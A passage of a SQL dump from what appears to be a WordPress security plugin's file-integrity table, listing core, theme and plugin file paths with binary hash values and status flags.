X�','wp-content/themes/doctors/core/includes/getver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�x��1rQk�<�\"','5v��}�\Z1�j��##OR��T;�[��MN�','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�a\"��Å�\Z}n�K��','Zm��+�w��Ⱦ���d������2�D','',0,'?'),('�p�s��#��\\�W�','wp-content/themes/regina-lite/layout/css/styles.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=��v��[�Q\0','[^\nd�Ӡ�A}ߦ���û��%��� \'�z\n�@','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�2�~����CO�',',f;��8`�=�[D�\n\\cA�O�Te�� ','',0,'?'),('����I�*�:o�','wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('�zZ�f���ip^�2','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+ M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T ��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('��\0h�+�)m�D\nW;��','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�K�0�b��xљ]','4����\n�c�E2=V�{�+�\\goЅ�O��','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�%$�$�H�b@��','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�!�(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����) ','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$?6/�%��k�<j��@�','����\r�/�t��:to���7�L�~���QLl~S','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n � ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�`���?ˑ�(��kK�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^\Z�4c\0��d����','Py��x��Jx�{:H*ru�dϽh��}H>�,','',0,'?'),('�k�q1��X�\n�0e[','wp-content/themes/weblog/acmethemes/hooks/social-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�DՑ���?��B4�','Gyd�s�ƾ�_h |-\\1�%ǝƿ����~�','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J �A��a�\\L�dz���4���~U�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('�{ܶ��a7��K#��h','wp-content/themes/wp-barrister/content-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�6C�j��c[G��$9�','�Y���EX_�m�y�d��ٛs�d���W_�','',0,'?'),('������>+ܞL[�m','wp-includes/js/tinymce/skins/lightgray/img/anchor.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a5q��ȑ_4�@','(afo��x�D�paQ6�mtk�,���V^','',0,'?'),('���(��%�#�9yn','wp-admin/css/forms.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j\'�~?2��]�g�Z','�c<*WB!�,�5\ZTQEF�#��h_a�~�','',0,'?'),('��o��bBr�j3#\r��','wp-content/plugins/wordfence/waf/pomo/entry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';²iGQ���A���w','79]���#�/��r�bC�te\\c���ߏ��P','',0,'?'),('���9+抳�\\�]�/�E','wp-content/themes/regina-lite/inc/components/pagination/class-mtl-pagination-output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1���+�]��R4�P','��EP�����ðޘG\0�\\�Wx��6���','',0,'?'),('��D���6�S�/�cQ�?','wp-includes/customize/class-wp-customize-background-position-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�QJt\"��!!�_�^ ','�릟�/Ԥ�o�kroQ���|E��Q�Z݁\ro','',0,'?'),('��{Z\n�0D\rO�M*Ut�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N �S�X�?z���','���Ԧ\n�ٲLK�Y���1�%�X7�~�*','',0,'?'),('�ӥyw��3�!FDNq�','wp-content/themes/regina-lite/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�y@SZ����x','�`\n��-զz�w���c�En�/�I�|_�I�Y','',0,'?'),('���� �6��\r�l���','wp-content/plugins/wordfence/js/jquery.colorbox-min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5�=��q��)����','H��4\\��v��/X�G��K����:gkl','',0,'?'),('����y��\0�\"��Q','wp-admin/user/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�V�����������','��m�\r�)��h0�E�C���N��`�D[ $3','',0,'?'),('��禦��z���b%*�','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-width.php',0,'g��8�RR��J���','g��8�RR��J���','��}��ڝ���$X����Y�\0%tJ�\'���','',0,'?'),('��~������r�C��','wp-admin/link-parse-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����xa۔2���F','�%�vP|X��:�x�>�]|��y|��:���','',0,'?'),('�j��Z�;\nlГ�','wp-includes/random_compat/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5&}k���!6�$�','X8�P���_9���kQ�a[��-mS\'<�@�!V:','',0,'?'),('�\r�y�R�]�x���\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�<P�S2��ȯV','Ӡ�P�G�B���$��� �JE3�n^�','',0,'?'),('��\\��3ݽ����.T','wp-content/themes/regina-lite/layout/js/plugins/pace/pace.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�py�[�bC�a�','}r;\'�H-_�[�yq�I�Kg�!dPe���','',0,'?'),('�!,(?����#���','wp-content/plugins/wp-cerber/assets/flags/ck.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'[8A3��;�y��g�','��3{����;��ߍ2�Dh��}��(��','',0,'?'),('�#��z4,똺]�','wp-content/themes/skt-toothy/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�^��cK�`x��','R�`k����C���?g��]$-���z-��6','',0,'?'),('�$]�5�f\'Û�|�lV','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-select-control.php',0,'��AS�7(VĨ��6�','��AS�7(VĨ��6�','�Z�\"Et�o�TK@NB5�!��Ϣp�d','',0,'?'),('�%�65{�\\�J����','wp-content/themes/healthcare/cover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9a���h�A`Q�^��\Z','���GĆD��q�~#rl�°�KI���A���','',0,'?'),('�:�u?͜PF��{S�M�','wp-content/plugins/wp-cerber/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�\n�.[�%�','\Zw<��>��s-��ӆd��@D�>f�\"�3','',0,'?'),('�:�m�᪘�h,$nd','wp-content/themes/regina-lite/inc/customizer/panels/site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��(��P�q� o��','������&nS!L�L���*PrGq�h��ҼG','',0,'?'),('�KF\nO�i�},�w�','wp-includes/random_compat/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[Bң�J�Ԉ�;',']�Q�˄=Pݵu�Q��{>ϐ���','',0,'?'),('�V9��K���goX��7�','wp-admin/images/align-left-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�8�O�����^��c','$kb�>�����k&�: ڂa�7��Zcdm��%','',0,'?'),('�{m����5U3�Y����','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�.��(�K�pQ��','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('�����H�S!;� �','wp-admin/js/user-profile.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���<�ِ�J��D��','�#�[�\Z*\n�L���=I�Dwguwd��,�\'�IE?�','',0,'?'),('��@�}�~�4G�v<�m','wp-includes/sodium_compat/src/Core32/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�b�f>���=���','����ߺ�`�\'���盱��Жx#i���#�','',0,'?'),('���+���q�pW��','wp-includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�瑥���\n��bk\0�q','��\n �U����y���A��80CĆ���6$3','',0,'?'),('���qXr:�Hx�[','wp-content/plugins/wp-cerber/assets/flags/ad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\Z�3� {��/_s_5�','j�~�+��E�A�9��M���\Z��e���c0T','',0,'?'),('���`�&X<�aQ�Vh\\','wp-admin/user/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x8��!���x�S�j','��J���f�v^�D�w�ۦ\n��s�Bu�/���L','',0,'?'),('���Pq-�t�@l�','wp-includes/images/wlw/wp-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1 �ʚ�7w3K��*','5 ��}�x(��r�:a,zmK�H1|/��+��','',0,'?'),('�\r�V��2P�-+x@�','wp-content/themes/twentynineteen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���JŐ\\�;�^�q��','}�D�uغ��i��I|�{�&��މ��g��0���','',0,'?'),('��gx�A�Ȣ}�g�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]ኮ���ȣ&','��K��#�@JU�}F�����,���![','',0,'?'),('�;wr��Q�ś�d1|�','wp-content/themes/wp-barrister/library/images/icon-tu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3&v�m����Eh,','�9��i���\0 z\n���0��=�Pߗh`ڵ9C�','',0,'?'),('� @�;��*�|��','wp-includes/Text/Diff/Engine/string.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��=�M��\0��i)','����d��[�%�nZR��`������','',0,'?'),('�1t�v�3�9]AaC-','wp-content/plugins/wp-cerber/assets/flags/bs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�t\Z���c��K�o�','_o &�\'����&�Q�R���~E�1�d','',0,'?'),('�A��Ve�?(X�`','wp-content/themes/doctors/core/home/home-js-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jV�s!F���3A#s��z',':��h*H̛4оs�d=�2��k��$��N)�)D3','',0,'?'),('��]��p�R�/$�1�','wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M#Ƃ,�n���j9{��','��+��������N)¨�����L K�z�(','',0,'?'),('��0����9��@3�','wp-content/themes/healthcare/css/owl.theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�L8��\"����','ė;�b\0�m��G�{Ȑ~�.���`�i�G!&�','',0,'?'),('���k�(�`7�Z�','wp-content/themes/skt-toothy/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��%��a�����&Z�','\n)���}��P�z�ͨ����4��5��9Xb�','',0,'?'),('��&���wn�zP~:�o','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/customizer/sections/class-epsilon-section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n���wy2�L)NI��','&@� �&�9�[��;`;�H�5g�����p��^s','',0,'?'),('������浉���C��','wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/6���Kd���|D','�)7; @v�L��>�]M|�c����)d����k','',0,'?'),('�����5��E�r','wp-content/plugins/wp-cerber/assets/flags/nr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*s�|�Ǯr�St��[','�bp%�a���,%M���q�^��4���$}�J','',0,'?'),('��_w�ƌ����','wp-includes/widgets/class-wp-widget-media-video.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}◷>y�O�G�','10*�u���ۤ��y[\\,�/��7��6�\r','',0,'?'),('���w�۸�\ru�1�','wp-content/themes/doctors/template-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S%(mf��[����~',';\"�c%!�ǩY>|V(\'�0�Ŵ�ɾ-��p�t�','',0,'?'),('��A-��zN���','wp-content/themes/twentynineteen/inc/helper-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ŀ<)�8�j���/SԜ','�ք��8�J��j��\n�� ��g�^\'�','',0,'?'),('�� ���b��o���','wp-content/themes/wp-barrister/library/images/icon-tw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��7�E�ʳHu','�m�}�$7�~V���X]\"^���b|�&��','',0,'?'),('�-|V���H�%��','wp-admin/site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�㚮�4�~�l��v-','0�co 觥���.����_A�T�\0^����)','',0,'?'),('��Ǣ�Bմ(�\\�0J','wp-includes/class-wp-text-diff-renderer-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�l��_\r�u���','��פme�,��V����9�}���� y���v�','',0,'?'),('�(��u�L)����O','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��7<�yf�\nb:ʄ','&O3w��Q��d�x�������@\n���m�?�$','',0,'?'),('�6N]bN��R������','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ �q�?s1����U','�REkks&]!i�_����\"���y~����Ka�','',0,'?'),('�;�%N!9�\nL&N���','wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.Ke�\"/�w�','KwĿ���\Z˅�+CH�J\n\'��x ���M','',0,'?'),('�@���sB0<�{l�3��','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԑ����i�^��','�ƤJľ**X|i���cy-�u6p�C-�$*\n�','',0,'?'),('�D=������S��C','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�X�������`йKZ','S�W��,��f���K{��\\�������^Y/�','',0,'?'),('�k����e<F��4','wp-admin/js/revisions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rӐn�� ����\Z','\roMQC�irtM�ҡ�����I����_','',0,'?'),('�u�\\����)��S�_','wp-content/plugins/redirection/actions/error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�0����._M0��','��@:k�a�7h��Ќ��-�}��~6k�','',0,'?'),('���D��=K�49���','wp-includes/js/codemirror/codemirror.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('���{N�X�)4�','wp-content/themes/doctors/template-noSidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�J��!���Fv�K','z6��P&6���׃�t��-�˽�D��9\Z}��kl','',0,'?'),('���5Qk�lT��/��','wp-content/themes/healthcare/css/font-awesome/scss/_path.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���V> {\\�5`�','���q�Uv��\'8K�R�=�h\"��l�','',0,'?'),('�������CMp<E��','wp-includes/class-wp-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�Q�\\�2%����','���`fO2��c���3/(�A̝T�tA�p','',0,'?'),('��6K1���(��}/AX','wp-admin/network/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���G-w���=�','|6���.�W��NScˆ��#��ޱ\0�2','',0,'?'),('�ݧlp�S*LST$�8/','wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���/k�$a��E9h�','8�E/ů�KK\rЛx���]2j�IԐu\r�kz','',0,'?'),('��7�Ub�&�9PY��','wp-content/themes/wp-barrister/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�x�:�>��yR�8�l','[�.���ە�z#9R�h�NV)�`6e>�d�','',0,'?'),('��ĩ�}x�(T��','wp-includes/js/dist/block-library.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�INo<�Rz�I����','�Op�2�j�|:,��a:�weҽ�H�S�/�.','',0,'?'),('�^Q6l��J!� �ͦ','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��oN�.��','>4��i3�|��v1�N��6�wD�)M��jr','',0,'?'),('��+�x�~� yi&\0Q','wp-content/themes/twentytwentyone/template-parts/header/site-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e@ڞF\n��1���','ǛO��g�\ZXPECn��o�`�����+�i','',0,'?'),('� ń1�r}mJGW�R��','wp-content/plugins/wordfence/views/scanner/options-group-performance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���P�=�PҤ��� ','�-9��\0t��D\\6�9s]��\\e\0R�r���','',0,'?'),('�!�e�A�<���#�s�','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-switch.php',0,'<��\'���[��4 �','<��\'���[��4 �','k�[�?��2��8n�h���C�Z2���DL9O��','',0,'?'),('�0�$�\'`�Õ�n�\\','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!<��Tp���+','�I�ʌ�?�(5�]]F�r�A�~�{t�J?��','',0,'?'),('��ɱ%��a{Z�j %�','wp-includes/class-wp-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('����I�:4P�U���','wp-includes/SimplePie/Cache/Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('��,���`�t��t�b7','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/i18n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MP�<^f�G�� C','V�$oBޞj��f0�֫�Qx�u�T�=a��`�K','',0,'?'),('��8K�� ?O]ʹY','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\ZlY^[F\r�2xʻ','�6=���S�q�-5 )��E�L}A�ViA]���','',0,'?'),('��苼����3���','wp-includes/blocks/shortcode/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[~ .z\n.a�Y^�h�w','�(��� �̰�bu���e�\nud���l�s&�','',0,'?'),('����p�l4[���e��','wp-admin/js/inline-edit-tax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(-\'���R���\"','�ݔ��7��\"^D�C���o>0ս�2]L�','',0,'?'),('��xw%��]�z^��`�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-slider-control.php',0,'P���[�Xwt�~�?','P���[�Xwt�~�?','��7&�s�f?��0!���7��\0�t��w�z�','',0,'?'),('�����Ѝ3�>#�.�','wp-includes/rest-api/class-wp-rest-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('��s�ˢ����N','wp-content/themes/doctors/core/includes/trunk/fe2/fe2_css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h��Sݧ*��P','�/��2�����I�s�,���<9Uy��3�۷','',0,'?'),('��K|H�#�[��x��','wp-includes/blocks/tag-cloud/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M0����*��','���-ZE�\n�*��6�]\\� ]m�{N��','',0,'?'),('�R��=��*�d��n�','wp-admin/includes/media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �V(#=���0�����?','�8�;�cb7�]���tt-p��#�Q(��C��','',0,'?'),('� e1�n2��c��Χ','wp-content/plugins/wp-cerber/assets/flags/uz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��S�UA��R-Ƌ','Ț���1}\n{%`Tbh����3�ٷ���.D�','',0,'?'),('���BoM<ؕ��','wp-content/plugins/redirection/models/log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Nj�E�}E[��h�','�����$����\0��b1Y����Έ_�|7!�BO','',0,'?'),('��8��=����[ձ�','wp-content/plugins/wordfence/modules/login-security/views/page/manage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eƧ�A.�E�2��$','YPU���ѱ�O�*��N=|H�Tt���\\8`','',0,'?'),('��A����)D4�','wp-includes/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s_7�;� ]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('�-^g��̺@\0/���','wp-content/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gD,V�=\\�bP','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�.ն���Zg{�=��','wp-admin/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�.� h`3XT\\W�ߴ','4�G˼���GO��w���m�qV�z8��밹','',0,'?'),('�0 �6�)̰��la�<~','wp-content/themes/regina-lite/layout/images/team/team-member-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Ƚ�G+XMBE7�W�',' �s���Dg{=�u�~u�o���,*N�78}','',0,'?'),('�H}�A�J�\nG�o)u','wp-content/plugins/wordfence/modules/login-security/css/login.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��᳀��2���rmV','���r���J]s6�8�2!��\ZpG����','',0,'?'),('�J6qOxR�*���1','wp-content/themes/doctors/core/assets/js/owl.carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lb�[�D(.��B�bY','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('�dd��+��[R��','wp-content/themes/doctors/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Խ���z�m�5dn`�',';����%��@_\n.��\'F��\"�j��詈�=q�','',0,'?'),('�n:�zW_�B�S�R��','wp-includes/js/jquery/ui/resizable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),('�s�=(���\ngfP�h��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϼ~c��祐i�','��L�3�gQ����������l\"�K�E�3_','',0,'?'),('�w ���+�j���','wp-content/plugins/wordfence/views/common/status-circular.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)�.=���g','q4^\"-�9����\nd1q����O,��','',0,'?'),('��7ڔ!�2�x%�XN�3','wp-content/plugins/wordfence/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�_\r�w�{iv�','W�q��$�|��yn���a�$\06ܖ<(�Ƴ�}','',0,'?'),('���~��a%��!�P','wp-includes/js/tinymce/skins/wordpress/images/pagebreak-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�6�#UQ:��|>#��','�(��[\n�̻�o�RAo�3��^����','',0,'?'),('��z�穁���E��}�','wp-content/themes/doctors/core/includes/trunk/fe2/fe2_home-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\n���ܟJ�w��','̮\Z��)��>���:��j�V��� ,f�\0�','',0,'?'),('�����L?@��.~O�','wp-admin/css/colors/midnight/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E~��2\'o �?�','� UWt��\"\Z��;��|w�^ r\"�:[_cA�}','',0,'?'),('����T\n���e.(��','wp-includes/class-wp-image-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\r��^��k���+)','�GY��<\Z�����\"B��v�Ԅ��2K9i��bQ','',0,'?'),('��ؘ�-�m4)}�� �','wp-includes/js/dist/reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�F疋��nA�^','�KJE(iLõN��5���KTc�B0$]�-}�۹','',0,'?'),('��GtYL�^O�@���{�','wp-content/plugins/redirection/modules/wordpress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0M^��+8S��;T�I\",','YG3���˫b(��doC�<�\0M��aG��?','',0,'?'),('��Z�p%\'n\Z��Wj��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ey���B�J','>?z�y��O�IncC!��Y�����;/:�<\nJ�','',0,'?'),('��}���PÛ�P\\�\Z','wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���B�9�$v\r ','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('��R�,�A���\Z�GJ\'-','wp-includes/default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=��B/˥oH:z','G�$�������q��ԑZ}\n�F�TB�刔','',0,'?'),('��(�(�0���r����N','wp-content/themes/regina-lite/inc/customizer/panels/our-team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�ZCX������m�','?BKx;�S�_~ZrJ���$��4�,T@����','',0,'?'),('���\n\\�ɶ.5���','wp-includes/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� 3X�ī9+�6n~','�� 